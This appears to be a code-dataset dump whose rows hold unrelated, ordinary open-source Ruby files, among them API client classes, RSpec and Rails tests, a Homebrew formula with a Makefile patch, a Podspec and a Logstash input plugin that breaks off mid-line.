hexsha
stringlengths
40
40
size
int64
2
1.01M
content
stringlengths
2
1.01M
avg_line_length
float64
1.5
100
max_line_length
int64
2
1k
alphanum_fraction
float64
0.25
1
2142210cfe5cf3708d5ffa5574506a4c5747f904
961
module Bambora::API class ProfileRequest attr_accessor :card, :token, :billing, :custom, :language, :comment, :validate def initialize(args = {}) if args.kind_of? Token self.token = args else args = {} if args.nil? args.symbolize_keys! self.card = Card.new(args[:card]) unless args[:card].nil? self.token = Token.new(args[:token]) unless args[:token].nil? self.billing = Address.new(args[:billing]) unless args[:billing].nil? self.custom = Custom.new(args[:custom]) unless args[:custom].nil? self.validate = args[:validate] end end def to_h h = { billing: billing, validate: validate } h.merge!( card: card.to_h ) unless card.nil? h.merge!( token: (token.kind_of?(Token) ? token.to_h : token) ) unless token.nil? h.merge!( custom: custom.to_h ) unless custom.nil? h end def to_json to_h.to_json end end end
29.121212
87
0.609781
620ae83179ef6c39dc93a90e588c4e8af61ca9b3
18,568
require "spec_helper" RSpec.describe IsoDoc do it "processes IsoXML bibliographies" do input = <<~INPUT <iso-standard xmlns="http://riboseinc.com/isoxml"> <bibdata> <language>en</language> </bibdata> <preface> <foreword> <p id="_f06fd0d1-a203-4f3d-a515-0bdba0f8d83f"> <eref bibitemid="ISO712"/> <eref bibitemid="ISBN"/> <eref bibitemid="ISSN"/> <eref bibitemid="ISO16634"/> <eref bibitemid="ref1"/> <eref bibitemid="ref10"/> <eref bibitemid="ref12"/> </p> </foreword> </preface> <bibliography> <references id="_normative_references" normative="true" obligation="informative"> <title>Normative References</title> <p>The following documents are referred to in the text in such a way that some or all of their content constitutes requirements of this document. For dated references, only the edition cited applies. For undated references, the latest edition of the referenced document (including any amendments) applies.</p> <bibitem id="ISO712" type="standard"> <title format="text/plain">Cereals or cereal products</title> <title format="text/plain" type="main">Cereals and cereal products</title> <docidentifier type="ISO">ISO 712</docidentifier> <contributor> <role type="publisher"/> <organization> <name>International Organization for Standardization</name> </organization> </contributor> </bibitem> <bibitem id="ISO16634" type="standard"> <title format="text/plain" language="x">Cereals, pulses, milled cereal products, xxxx, oilseeds and animal feeding stuffs</title> <title format="text/plain" language="en">Cereals, pulses, milled cereal products, oilseeds and animal feeding stuffs</title> <docidentifier type="ISO">ISO 16634:-- (all parts)</docidentifier> <date type="published"> <on>--</on> </date> <contributor> <role type="publisher"/> <organization> <abbreviation>ISO</abbreviation> </organization> </contributor> <note format="text/plain" reference="1" type="Unpublished-Status">Under preparation. (Stage at the time of publication ISO/DIS 16634)</note> <extent type="part"> <referenceFrom>all</referenceFrom> </extent> </bibitem> <bibitem id="ISO20483" type="standard"> <title format="text/plain">Cereals and pulses</title> <docidentifier type="ISO">ISO 20483:2013-2014</docidentifier> <date type="published"> <from>2013</from> <to>2014</to> </date> <contributor> <role type="publisher"/> <organization> <name>International Organization for Standardization</name> </organization> </contributor> </bibitem> <bibitem id="ref1"> <formattedref format="application/x-isodoc+xml"> <smallcap>Standard No I.C.C 167</smallcap> . <em>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</em> (see <link target="http://www.icc.or.at"/> )</formattedref> <docidentifier type="ICC">167</docidentifier> </bibitem> <note> <p>This is an annotation of ISO 20483:2013-2014</p> </note> </references> <references id="_bibliography" normative="false" obligation="informative"> <title>Bibliography</title> <bibitem id="ISBN" type="ISBN"> <title format="text/plain">Chemicals for analytical laboratory use</title> <docidentifier type="ISBN">ISBN</docidentifier> <docidentifier type="metanorma">[1]</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISBN</abbreviation> </organization> </contributor> </bibitem> <bibitem id="ISSN" type="ISSN"> <title format="text/plain">Instruments for analytical laboratory use</title> <docidentifier type="ISSN">ISSN</docidentifier> <docidentifier type="metanorma">[2]</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISSN</abbreviation> </organization> </contributor> </bibitem> <note> <p>This is an annotation of document ISSN.</p> </note> <note> <p>This is another annotation of document ISSN.</p> </note> <bibitem id="ISO3696" type="standard"> <title format="text/plain">Water for analytical laboratory use</title> <docidentifier type="ISO">ISO 3696</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISO</abbreviation> </organization> </contributor> </bibitem> <bibitem id="ref10"> <formattedref format="application/x-isodoc+xml"> <smallcap>Standard No I.C.C 167</smallcap> . <em>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</em> (see <link target="http://www.icc.or.at"/> )</formattedref> <docidentifier type="metanorma">[10]</docidentifier> </bibitem> <bibitem id="ref11"> <title>Internet Calendaring and Scheduling Core Object Specification (iCalendar)</title> <docidentifier type="IETF">RFC 10</docidentifier> </bibitem> <bibitem id="ref12"> <formattedref format="application/x-isodoc+xml">CitationWorks. 2019. <em>How to cite a reference</em> .</formattedref> <docidentifier type="metanorma">[Citn]</docidentifier> <docidentifier type="IETF">RFC 20</docidentifier> </bibitem> </references> </bibliography> </iso-standard> INPUT presxml = <<~OUTPUT <iso-standard type="presentation" xmlns="http://riboseinc.com/isoxml"> <bibdata> <language current="true">en</language> </bibdata> <preface> <foreword displayorder="1"> <p id="_f06fd0d1-a203-4f3d-a515-0bdba0f8d83f"> <eref bibitemid="ISO712">ISO 712</eref> <eref bibitemid="ISBN">[1]</eref> <eref bibitemid="ISSN">[2]</eref> <eref bibitemid="ISO16634">ISO 16634:--</eref> <eref bibitemid="ref1">ICC 167</eref> <eref bibitemid="ref10">[10]</eref> <eref bibitemid="ref12">Citn</eref> </p> </foreword> </preface> <bibliography> <references id="_normative_references" normative="true" obligation="informative" displayorder="2"> <title depth="1">1<tab/>Normative References</title> <p>The following documents are referred to in the text in such a way that some or all of their content constitutes requirements of this document. For dated references, only the edition cited applies. For undated references, the latest edition of the referenced document (including any amendments) applies. </p> <bibitem id="ISO712" type="standard"> <title format="text/plain">Cereals or cereal products</title> <title format="text/plain" type="main">Cereals and cereal products</title> <docidentifier type="ISO">ISO 712</docidentifier> <contributor> <role type="publisher"/> <organization> <name>International Organization for Standardization</name> </organization> </contributor> </bibitem> <bibitem id="ISO16634" type="standard"> <title format="text/plain" language="x">Cereals, pulses, milled cereal products, xxxx, oilseeds and animal feeding stuffs </title> <title format="text/plain" language="en">Cereals, pulses, milled cereal products, oilseeds and animal feeding stuffs</title> <docidentifier type="ISO">ISO 16634:-- (all parts)</docidentifier> <date type="published"> <on>--</on> </date> <contributor> <role type="publisher"/> <organization> <abbreviation>ISO</abbreviation> </organization> </contributor> <note format="text/plain" reference="1" type="Unpublished-Status">Under preparation. (Stage at the time of publication ISO/DIS 16634)</note> <extent type="part"> <referenceFrom>all</referenceFrom> </extent> </bibitem> <bibitem id="ISO20483" type="standard"> <title format="text/plain">Cereals and pulses</title> <docidentifier type="ISO">ISO 20483:2013-2014</docidentifier> <date type="published"> <from>2013</from> <to>2014</to> </date> <contributor> <role type="publisher"/> <organization> <name>International Organization for Standardization</name> </organization> </contributor> </bibitem> <bibitem id="ref1"> <formattedref format="application/x-isodoc+xml"> <smallcap>Standard No I.C.C 167</smallcap> . <em>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</em> (see <link target="http://www.icc.or.at"/> )</formattedref> <docidentifier type="ICC">ICC 167</docidentifier> </bibitem> <note> <name>NOTE</name> <p>This is an annotation of ISO 20483:2013-2014</p> </note> </references> <references id="_bibliography" normative="false" obligation="informative" displayorder="3"> <title depth="1">Bibliography</title> <bibitem id="ISBN" type="ISBN"> <title format="text/plain">Chemicals for analytical laboratory use</title> <docidentifier type="ISBN">ISBN</docidentifier> <docidentifier type="metanorma">[1]</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISBN</abbreviation> </organization> </contributor> </bibitem> <bibitem id="ISSN" type="ISSN"> <title format="text/plain">Instruments for analytical laboratory use</title> <docidentifier type="ISSN">ISSN</docidentifier> <docidentifier type="metanorma">[2]</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISSN</abbreviation> </organization> </contributor> </bibitem> <note> <name>NOTE</name> <p>This is an annotation of document ISSN.</p> </note> <note> <name>NOTE</name> <p>This is another annotation of document ISSN.</p> </note> <bibitem id="ISO3696" type="standard"> <title format="text/plain">Water for analytical laboratory use</title> <docidentifier type='metanorma-ordinal'>[3]</docidentifier> <docidentifier type="ISO">ISO 3696</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISO</abbreviation> </organization> </contributor> </bibitem> <bibitem id="ref10"> <formattedref format="application/x-isodoc+xml"> <smallcap>Standard No I.C.C 167</smallcap> . <em>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</em> (see <link target="http://www.icc.or.at"/> )</formattedref> <docidentifier type="metanorma">[10]</docidentifier> </bibitem> <bibitem id="ref11"> <title>Internet Calendaring and Scheduling Core Object Specification (iCalendar)</title> <docidentifier type='metanorma-ordinal'>[4]</docidentifier> <docidentifier type="IETF">IETF RFC 10</docidentifier> </bibitem> <bibitem id="ref12"> <formattedref format="application/x-isodoc+xml">CitationWorks. 2019. <em>How to cite a reference</em> .</formattedref> <docidentifier type="metanorma">[Citn]</docidentifier> <docidentifier type="IETF">IETF RFC 20</docidentifier> </bibitem> </references> </bibliography> </iso-standard> OUTPUT html = <<~OUTPUT #{HTML_HDR} <br/> <div> <h1 class="ForewordTitle">Foreword</h1> <p id="_f06fd0d1-a203-4f3d-a515-0bdba0f8d83f"> <a href="#ISO712">ISO 712</a> <a href="#ISBN">[1]</a> <a href="#ISSN">[2]</a> <a href="#ISO16634">ISO 16634:--</a> <a href="#ref1">ICC 167</a> <a href="#ref10">[10]</a> <a href="#ref12">Citn</a> </p> </div> <p class="zzSTDTitle1"/> <div> <h1>1&#160; Normative References</h1> <p>The following documents are referred to in the text in such a way that some or all of their content constitutes requirements of this document. For dated references, only the edition cited applies. For undated references, the latest edition of the referenced document (including any amendments) applies.</p> <p class="NormRef" id="ISO712">ISO 712, <i>Cereals and cereal products</i></p> <p class="NormRef" id="ISO16634">ISO 16634:-- (all parts) <a class="FootnoteRef" href="#fn:1"> <sup>1</sup></a>, <i>Cereals, pulses, milled cereal products, oilseeds and animal feeding stuffs</i></p> <p class="NormRef" id="ISO20483">ISO 20483:2013-2014, <i>Cereals and pulses</i></p> <p class="NormRef" id="ref1">ICC 167, <span style="font-variant:small-caps;">Standard No I.C.C 167</span> . <i>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</i> (see <a href="http://www.icc.or.at">http://www.icc.or.at</a> )</p> <div class="Note"> <p> <span class="note_label">NOTE</span>&#160; This is an annotation of ISO 20483:2013-2014</p> </div> </div> <br/> <div> <h1 class="Section3">Bibliography</h1> <p class="Biblio" id="ISBN">[1]&#160; <i>Chemicals for analytical laboratory use</i></p> <p class="Biblio" id="ISSN">[2]&#160; <i>Instruments for analytical laboratory use</i></p> <div class="Note"> <p> <span class="note_label">NOTE</span>&#160; This is an annotation of document ISSN.</p> </div> <div class="Note"> <p> <span class="note_label">NOTE</span>&#160; This is another annotation of document ISSN.</p> </div> <p class="Biblio" id="ISO3696">[3]&#160; ISO 3696, <i>Water for analytical laboratory use</i></p> <p class="Biblio" id="ref10">[10]&#160; <span style="font-variant:small-caps;">Standard No I.C.C 167</span> . <i>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</i> (see <a href="http://www.icc.or.at">http://www.icc.or.at</a> )</p> <p class="Biblio" id="ref11">[4]&#160; IETF RFC 10, <i>Internet Calendaring and Scheduling Core Object Specification (iCalendar)</i></p> <p class="Biblio" id="ref12">Citn&#160; IETF RFC 20, CitationWorks. 2019. <i>How to cite a reference</i> .</p> </div> <aside class="footnote" id="fn:1"> <p>Under preparation. (Stage at the time of publication ISO/DIS 16634)</p> </aside> </div> </body> </html> OUTPUT expect(xmlpp(IsoDoc::Iso::PresentationXMLConvert.new({}) .convert("test", input, true)) .sub(%r{<localized-strings>.*</localized-strings>}m, "")) .to be_equivalent_to xmlpp(presxml) expect(xmlpp(IsoDoc::Iso::HtmlConvert.new({}) .convert("test", presxml, true))) .to be_equivalent_to xmlpp(html) end end
46.888889
323
0.533121
e8297dd2ad4ca13dd09d498a74e68919384cc7b6
544
desc "Project issues tools - sub-commands : open [user], closed [user]" flags :after => "Only show issues updated after a certain date" flags :label => "Only show issues with a certain label" command :issues do |command, user| return if !helper.project user ||= helper.owner case command when 'open', 'closed' report = YAML.load(open(@helper.list_issues_for(user, command))) @helper.print_issues(report['issues'], options) when 'web' helper.open helper.issues_page_for(user) else helper.print_issues_help end end
30.222222
71
0.715074
33796004d9f07adb805a9de9643812fda494c299
42
module Giferizer VERSION = "0.1.0" end
10.5
19
0.666667
f7801db8f4948833c6678f1b4ebefbf63b2a8aef
1,757
require 'formula' class Libdlna < Formula homepage 'http://libdlna.geexbox.org/' url 'http://libdlna.geexbox.org/releases/libdlna-0.2.4.tar.bz2' sha1 '5e86f4443eeb9e7194c808301efeb78611a9e8b3' depends_on 'ffmpeg' # Use dylib instead of soname patch :DATA def install system "./configure", "--disable-debug", "--prefix=#{prefix}" system "make install" end end __END__ diff --git a/src/Makefile b/src/Makefile index 3e6f704..9701878 100644 --- a/src/Makefile +++ b/src/Makefile @@ -21,10 +21,10 @@ ifeq ($(DEVELOPER),yes) endif LIBNAME = libdlna -LIBNAME_SHARED = ${LIBNAME}.so +LIBNAME_SHARED = ${LIBNAME}.dylib LIBNAME_STATIC = ${LIBNAME}.a -LIBNAME_VERSION = $(LIBNAME_SHARED).$(VERSION) -LIBNAME_MAJOR = $(LIBNAME_SHARED).$(shell echo $(VERSION) | cut -f1 -d.) +LIBNAME_VERSION = $(LIBNAME).$(VERSION).dylib +LIBNAME_MAJOR = $(LIBNAME).$(shell echo $(VERSION) | cut -f1 -d.).dylib SRCS = profiles.c \ containers.c \ @@ -97,8 +97,9 @@ lib_shared_info_post: @echo "#############################################" lib_shared: lib_shared_info_pre $(LOBJS) lib_shared_info_post - $(CC) -shared -Wl,-soname,$(LIBNAME_MAJOR) $(LOBJS) \ - $(LDFLAGS) $(EXTRALIBS) -o $(LIBNAME_VERSION) + $(CC) -dynamiclib $(LOBJS) $(LDFLAGS) $(EXTRALIBS) -o $(LIBNAME_VERSION) \ + -Wl,-install_name,$(PREFIX)/lib/$(LIBNAME_VERSION) \ + -Wl,-compatibility_version,$(VERSION) -Wl,-current_version,$(VERSION) $(LN) -sf $(LIBNAME_VERSION) $(LIBNAME_MAJOR) $(LN) -sf $(LIBNAME_MAJOR) $(LIBNAME_SHARED) @@ -111,7 +112,7 @@ tags: ( find -name '*.[chS]' -print ) | xargs ctags -a; clean: - -$(RM) -f *.o *.lo *.a *.so* + -$(RM) -f *.o *.lo *.a *.dylib -$(RM) -f .depend install_static: lib_static
29.283333
76
0.635743
ac0cf566fb2b04e77c8338de40bce06718076641
116
# frozen_string_literal: true require 'test_helper' module OmniAuth class BCryptTest < Minitest::Test end end
12.888889
35
0.775862
878f06195e9e2641d60d4d00600274b6ea002ac2
880
require 'messages/metadata_base_message' require 'messages/validators' module VCAP::CloudController class BuildpackCreateMessage < MetadataBaseMessage MAX_BUILDPACK_NAME_LENGTH = 250 MAX_STACK_LENGTH = 250 register_allowed_keys [:name, :stack, :position, :enabled, :locked] validates_with NoAdditionalKeysValidator validates :name, string: true, presence: true, allow_nil: false, length: { maximum: MAX_BUILDPACK_NAME_LENGTH }, format: /\A[-\w]+\z/ validates :stack, string: true, allow_nil: true, length: { maximum: MAX_STACK_LENGTH } validates :position, allow_nil: true, numericality: { greater_than_or_equal_to: 1, only_integer: true } validates :enabled, allow_nil: true, boolean: true validates :locked, allow_nil: true, boolean: true end end
23.783784
71
0.680682
87ca79e4989b96b5b3b70a353180c77288f9b9ad
66
require 'coveralls' Coveralls.wear_merged! require 'test_config'
13.2
22
0.818182
f8528e0223a6775b1f4215b2eb8b564ff2d4b68e
1,456
class ApplicationHelper::Toolbar::CloudObjectStoreObjectsCenter < ApplicationHelper::Toolbar::Basic button_group( 'cloud_object_store_object_vmdb', [ select( :cloud_object_store_object_vmdb_choice, nil, t = N_('Configuration'), t, :enabled => false, :onwhen => "1+", :items => [ button( :cloud_object_store_object_delete, 'pficon pficon-delete fa-lg', N_('Remove selected Object Storage Objects from Inventory'), N_('Remove Object Storage Objects from Inventory'), :url_parms => "main_div", :send_checked => true, :confirm => N_("Warning: The selected Object Storage Object will be permanently removed!"), :enabled => false, :onwhen => "1+" ), ] ), ] ) button_group('cloud_object_store_object_policy', [ select( :cloud_object_store_object_policy_choice, nil, t = N_('Policy'), t, :enabled => false, :onwhen => "1+", :items => [ button( :cloud_object_store_object_tag, 'pficon pficon-edit fa-lg', N_('Edit tags for the selected items'), N_('Edit Tags'), :url_parms => "main_div", :send_checked => true, :enabled => false, :onwhen => "1+") ] ) ]) end
29.12
108
0.524038
abb096c42428e855a9811e04a9267b17ce15240f
824
require 'spec_helper' module Bosh::Director::DeploymentPlan module PlacementPlanner describe TieStrategy do let(:az1) { AvailabilityZone.new("1", {}) } let(:az2) { AvailabilityZone.new("2", {}) } let(:az3) { AvailabilityZone.new("3", {}) } describe TieStrategy::MinWins do subject { described_class.new } it 'chooses the minimum' do expect(subject.call([az1, az2])).to eq(az1) end end describe TieStrategy::RandomWins do subject { described_class.new(random: fake_random) } let(:fake_random) do r = Object.new def r.rand(n) 1 end r end it 'chooses a random az' do expect(subject.call([az1, az2])).to eq(az2) end end end end end
22.888889
60
0.56068
18284dcc9336cc6bfd1529e3ffa8629e511a4633
5,257
=begin PureCloud Platform API With the PureCloud Platform API, you can control all aspects of your PureCloud environment. With the APIs you can access the system configuration, manage conversations and more. OpenAPI spec version: v2 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git License: UNLICENSED https://help.mypurecloud.com/articles/terms-and-conditions/ Terms of Service: https://help.mypurecloud.com/articles/terms-and-conditions/ =end require 'date' module PureCloud class ConversationSocialExpressionEventTopicUriReference attr_accessor :id attr_accessor :name # Attribute mapping from ruby-style variable name to JSON key. def self.attribute_map { :'id' => :'id', :'name' => :'name' } end # Attribute type mapping. def self.swagger_types { :'id' => :'String', :'name' => :'String' } end # Initializes the object # @param [Hash] attributes Model attributes in the form of hash def initialize(attributes = {}) return unless attributes.is_a?(Hash) # convert string to symbol for hash key attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v} if attributes.has_key?(:'id') self.id = attributes[:'id'] end if attributes.has_key?(:'name') self.name = attributes[:'name'] end end # Show invalid properties with the reasons. Usually used together with valid? # @return Array for valid properies with the reasons def list_invalid_properties invalid_properties = Array.new return invalid_properties end # Check to see if the all the properties in the model are valid # @return true if the model is valid def valid? end # Checks equality by comparing each attribute. # @param [Object] Object to be compared def ==(o) return true if self.equal?(o) self.class == o.class && id == o.id && name == o.name end # @see the `==` method # @param [Object] Object to be compared def eql?(o) self == o end # Calculates hash code according to all attributes. # @return [Fixnum] Hash code def hash [id, name].hash end # build the object from hash def build_from_hash(attributes) return nil unless attributes.is_a?(Hash) self.class.swagger_types.each_pair do |key, type| if type =~ /^Array<(.*)>/i if attributes[self.class.attribute_map[key]].is_a?(Array) self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } ) else #TODO show warning in debug mode end elsif !attributes[self.class.attribute_map[key]].nil? self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]])) else # data not found in attributes(hash), not an issue as the data can be optional end end self end def _deserialize(type, value) case type.to_sym when :DateTime DateTime.parse(value) when :Date Date.parse(value) when :String value.to_s when :Integer value.to_i when :Float value.to_f when :BOOLEAN if value.to_s =~ /^(true|t|yes|y|1)$/i true else false end when :Object # generic object (usually a Hash), return directly value when /\AArray<(?<inner_type>.+)>\z/ inner_type = Regexp.last_match[:inner_type] value.map { |v| _deserialize(inner_type, v) } when /\AHash<(?<k_type>.+), (?<v_type>.+)>\z/ k_type = Regexp.last_match[:k_type] v_type = Regexp.last_match[:v_type] {}.tap do |hash| value.each do |k, v| hash[_deserialize(k_type, k)] = _deserialize(v_type, v) end end else # model _model = Object.const_get("PureCloud").const_get(type).new _model.build_from_hash(value) end end def to_s to_hash.to_s end # to_body is an alias to to_body (backward compatibility)) def to_body to_hash end # return the object in the form of hash def to_hash hash = {} self.class.attribute_map.each_pair do |attr, param| value = self.send(attr) next if value.nil? hash[param] = _to_hash(value) end hash end # Method to output non-array value in the form of hash # For object, use to_hash. Otherwise, just return the value def _to_hash(value) if value.is_a?(Array) value.compact.map{ |v| _to_hash(v) } elsif value.is_a?(Hash) {}.tap do |hash| value.each { |k, v| hash[k] = _to_hash(v) } end elsif value.respond_to? :to_hash value.to_hash else value end end end end
23.15859
177
0.576374
1a557c2c98c40a366a3e507eecf88d8eeb3896e1
282
module HealthSeven::V2_7_1 class QcnJ01 < ::HealthSeven::Message attribute :msh, Msh, position: "MSH", require: true attribute :sfts, Array[Sft], position: "SFT", multiple: true attribute :uac, Uac, position: "UAC" attribute :qid, Qid, position: "QID", require: true end end
35.25
62
0.716312
398d40a73f27f7148dd3fed77c826a93172bd47f
288
require 'test_helper' class EnrollmentsControllerTest < ActionDispatch::IntegrationTest test 'should get create' do get enrollments_create_url assert_response :success end test 'should get destroy' do get enrollments_destroy_url assert_response :success end end
20.571429
65
0.777778
035481759b080fc862705c4d06356cb8d664f85f
684
# frozen_string_literal: true require 'spec_helper_acceptance' describe 'letsencrypt::plugin::dns_route53' do context 'with defaults values' do pp = <<-PUPPET class { 'letsencrypt' : email => '[email protected]', config => { 'server' => 'https://acme-staging-v02.api.letsencrypt.org/directory', }, } class { 'letsencrypt::plugin::dns_route53': } PUPPET it 'installs letsencrypt and dns route53 plugin without error' do apply_manifest(pp, catch_failures: true) end it 'installs letsencrypt and dns route53 idempotently' do apply_manifest(pp, catch_changes: true) end end end
25.333333
79
0.653509
61d245689325bd352c011736bcb9654e9c8852cc
1,041
# frozen_string_literal: true module GraphQL module Execution # Boolean checks for how an AST node's directives should # influence its execution module DirectiveChecks SKIP = "skip" INCLUDE = "include" module_function # @return [Boolean] Should this node be included in the query? def include?(directive_irep_nodes, query) directive_irep_nodes.each do |directive_irep_node| name = directive_irep_node.name directive_defn = query.schema.directives[name] case name when SKIP args = query.arguments_for(directive_irep_node, directive_defn) if args['if'] == true return false end when INCLUDE args = query.arguments_for(directive_irep_node, directive_defn) if args['if'] == false return false end else # Undefined directive, or one we don't care about end end true end end end end
28.135135
75
0.599424
1a7a7df3f61faa6aac2cee11de39c5b0ac7ff0c7
1,505
require 'test_helper' class SalesControllerTest < ActionDispatch::IntegrationTest setup do @sale = sales(:one) end test "should get index" do get sales_url assert_response :success end test "should get new" do get new_sale_url assert_response :success end test "should create sale" do assert_difference('Sale.count') do post sales_url, params: { sale: { comments: @sale.comments, customer_id: @sale.customer_id, customer_name: @sale.customer_name, customer_phone: @sale.customer_phone, date: @sale.date, number_of_items: @sale.number_of_items, payment_method: @sale.payment_method, total_charge: @sale.total_charge, user_id: @sale.user_id } } end assert_redirected_to sale_url(Sale.last) end test "should show sale" do get sale_url(@sale) assert_response :success end test "should get edit" do get edit_sale_url(@sale) assert_response :success end test "should update sale" do patch sale_url(@sale), params: { sale: { comments: @sale.comments, customer_id: @sale.customer_id, customer_name: @sale.customer_name, customer_phone: @sale.customer_phone, date: @sale.date, number_of_items: @sale.number_of_items, payment_method: @sale.payment_method, total_charge: @sale.total_charge, user_id: @sale.user_id } } assert_redirected_to sale_url(@sale) end test "should destroy sale" do assert_difference('Sale.count', -1) do delete sale_url(@sale) end assert_redirected_to sales_url end end
30.714286
333
0.73289
f74d1a8ab41b2808b52a4140272e44ae9440019c
230
require 'spec_helper' describe ChinaCity::DataController do describe "GET 'show'" do it "returns http success" do get 'show', id: '000000', use_route: 'china_city' response.should be_success end end end
17.692308
55
0.682609
62620f93304999e31f9fcab84f614969782155f3
1,470
# typed: true class Parent extend T::Helpers extend T::Sig abstract! # This should fail, as `T.attached_class` doesn't make sense in an instance # method context. sig {returns(T.nilable(T.experimental_attached_class))} # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ error: `T.experimental_attached_class` may only be def bad_sig nil end sig {returns(T.nilable(T.experimental_attached_class))} def self.make() # TODO(trevor): It would be nice if this could be `new`, but that's running # into problems when checking the concrete type returned by `Class#new` # against the `T.attached_class` param. nil end end class Child < Parent; end class GrandChild < Child; end T.reveal_type(Child.make) # error: Revealed type: `T.nilable(Child)` T.reveal_type(GrandChild.make) # error: Revealed type: `T.nilable(GrandChild)` T.reveal_type(T::Array[Integer].new) # error: Revealed type: `T::Array[Integer]` # Ensure that untyped generics still work correctly T.reveal_type(Array.new) # error: Revealed type: `T::Array[T.untyped]` # File is an interesting case because its `Elem` type member is fixed as String. # When `T.attached_class` is bounded at the wrong time, the use of `externalType` # will default this incorrectly, and the use of `File.new` without specifying # the parameters will cause this to turn into `T.untyped` instead. T.reveal_type(File.new("foo", "r").first) # error: Revealed type: `T.nilable(String)`
35
105
0.704082
f85a5c7704c8960df7e3772ccd4d55ac5aaf379e
680
module YoudaoFanyiAPI module Configuration VALID_OPTIONS = %i[key keyfrom].freeze DEFAULT_OPTIONS = %i[type doctype version].freeze OPTIONS = VALID_OPTIONS + DEFAULT_OPTIONS DEFAULT_TYPE = 'data' DEFAULT_DOCTYPE = 'json' DEFAULT_VERSION = '1.1' attr_accessor *OPTIONS def self.extended(base) base.reset end def reset self.key = nil self.keyfrom = nil self.type = DEFAULT_TYPE self.doctype = DEFAULT_DOCTYPE self.version = DEFAULT_VERSION end def configure yield self end def options OPTIONS.collect { |key| [key, send(key)] }.to_h end end end
20.606061
53
0.629412
21116c11d42f5057b135e541e9943c8a2b3a5c02
127
require 'test_helper' class CastingPersonTest < ActiveSupport::TestCase # test "the truth" do # assert true # end end
15.875
49
0.716535
395f53d9b934f2e9ae11f73e823fc911b93da1c9
106
RSpec.describe Coals do it 'has a version number' do expect(Coals::VERSION).not_to be nil end end
17.666667
40
0.716981
26113c315693430b85e5a5edca0e81ce56ae4933
247
require File.expand_path('../lib/vega-previewer', __FILE__) directory = File.expand_path('../vega', __FILE__) server = VegaPreviewer::Server.new(directory) listener = VegaPreviewer::Listener.new(directory, server) listener.start run server
24.7
59
0.761134
614100d665e4b30f9c736e1a2f731a8788c1798c
405
class CreateApplicantDetails < ActiveRecord::Migration def change create_table :applicant_details do |t| t.string :name t.string :email t.string :phonenumber t.string :location t.integer :experience t.integer :min_salary t.integer :max_salary t.references :requirement, index: true, foreign_key: true t.timestamps null: false end end end
23.823529
63
0.676543
0305e0cf1198cdddc53611fc249bc26ec3ea04c3
513
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::MediaServices::Mgmt::V2019_05_01_preview module Models # # Defines values for JobState # module JobState Canceled = "Canceled" Canceling = "Canceling" Error = "Error" Finished = "Finished" Processing = "Processing" Queued = "Queued" Scheduled = "Scheduled" end end end
23.318182
70
0.664717
38c38d4d83df36ace991b5cae06d612b9dc05225
1,611
Pod::Spec.new do |s| s.name = 'porcupine' s.version = '1.9.0' s.summary = 'A Flutter package plugin for Picovoice\'s Porcupine wake word engine' s.description = <<-DESC A Flutter package plugin for Picovoice\'s Porcupine wake word engine. DESC s.homepage = 'https://picovoice.ai/' s.license = { :type => 'Apache-2.0' } s.author = { 'Picovoice' => '[email protected]' } s.source = { :git => "https://github.com/Picovoice/porcupine.git" } s.source_files = 'Classes/**/*' s.platform = :ios, '9.0' s.dependency 'Flutter' s.static_framework = true # Flutter.framework does not contain a i386 slice. s.pod_target_xcconfig = { 'OTHER_LDFLAGS' => '-ObjC', 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'i386'} s.subspec 'pv_porcupine' do |sc| sc.pod_target_xcconfig = { 'SWIFT_INCLUDE_PATHS' => '$(PODS_TARGET_SRCROOT)/pv_porcupine', 'OTHER_CFLAGS' => '-Xcc -fmodule-map-file="${PODS_TARGET_SRCROOT}/pv_porcupine/module.private.modulemap"', 'OTHER_SWIFT_FLAGS' => '-Xcc -fmodule-map-file="${PODS_TARGET_SRCROOT}/pv_porcupine/module.private.modulemap"', } sc.vendored_libraries = 'pv_porcupine/libpv_porcupine.a' sc.source_files = 'pv_porcupine/pv_porcupine.h', 'pv_porcupine/picovoice.h' sc.public_header_files = 'pv_porcupine/pv_porcupine.h', 'pv_porcupine/picovoice.h' sc.preserve_paths = 'pv_porcupine/libpv_porcupine.a', 'pv_porcupine/module.private.modulemap' end s.swift_version = '5.0' end
44.75
127
0.638734
bb78682ee30f4423ba9a05c5cc45419edd5de98c
4,932
require "logstash/inputs/base" require "logstash/namespace" require "pathname" require "socket" # for Socket.gethostname # Stream events from files. # # By default, each event is assumed to be one line. If you # want to join lines, you'll want to use the multiline filter. # # Files are followed in a manner similar to "tail -0F". File rotation # is detected and handled by this input. class LogStash::Inputs::File < LogStash::Inputs::Base config_name "file" plugin_status "beta" # The path to the file to use as an input. # You can use globs here, such as `/var/log/*.log` # Paths must be absolute and cannot be relative. config :path, :validate => :array, :required => true # Exclusions (matched against the filename, not full path). Globs # are valid here, too. For example, if you have # # path => "/var/log/*" # # you might want to exclude gzipped files: # # exclude => "*.gz" config :exclude, :validate => :array # How often we stat files to see if they have been modified. Increasing # this interval will decrease the number of system calls we make, but # increase the time to detect new log lines. config :stat_interval, :validate => :number, :default => 1 # How often we expand globs to discover new files to watch. config :discover_interval, :validate => :number, :default => 15 # Where to write the since database (keeps track of the current # position of monitored log files). The default will write # sincedb files to some path matching "$HOME/.sincedb*" config :sincedb_path, :validate => :string # How often to write a since database with the current position of # monitored log files. config :sincedb_write_interval, :validate => :number, 